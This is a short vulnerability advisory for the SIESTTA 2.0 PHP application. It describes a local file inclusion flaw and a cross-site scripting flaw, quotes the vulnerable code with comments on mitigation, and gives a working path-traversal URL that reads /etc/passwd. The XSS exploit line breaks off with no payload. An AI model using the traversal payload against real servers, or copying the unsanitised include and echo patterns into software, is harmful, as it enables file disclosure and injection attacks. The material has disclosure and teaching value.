####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://ramoncastro.es/siestta_old/
#
# Author: Jose Luis Gongora Fernandez 'aka' JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
####################################################################
#
# requires register_globals = On (the LFI below relies on $idioma being populated from the request)
#
####################################################################
- [#LFI] <login.php>
<?php
// LFI sink: the language name is concatenated straight into the include path.
// $idioma is not assigned anywhere in this excerpt; per the advisory header it is
// expected to arrive from the request via register_globals = On, so the path
// component is request-controlled. (The trailing .'' is a no-op concatenation.)
// Mitigation: resolve the requested language against a fixed allowlist
// (e.g. a map of language code => filename) and never pass request data to
// require/include.
require('idioma/'.$idioma.'');
...
?>
!EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00
- [#XSS] <carga_foto_al.php>
<?
...
// Untrusted input: $usuario is read verbatim from the query string with no
// validation, no character restriction, and no check that the key exists.
$usuario = $_GET['usuario'];
// $usuario is spliced unchanged into the image URL that is emitted below; a
// restrictive check before this point (e.g. ctype_alnum on the value) would
// bound what can reach the output.
$imagen = 'admin/fotos_al/'.$usuario.'.jpg';
// XSS sink: this echo (the string literal continues on the next code line) writes
// $imagen and $usuario into the src and alt attributes with no HTML escaping.
// Mitigation: escape each value at output with
// htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), in addition to
// validating $usuario on input.
echo '<p style="text-align:center;">
<img class="foto" src="'.$imagen.'" alt="'.$usuario.'" /></p>
...
?>
!EXPLOIT: /carga_foto_al.php?usuario=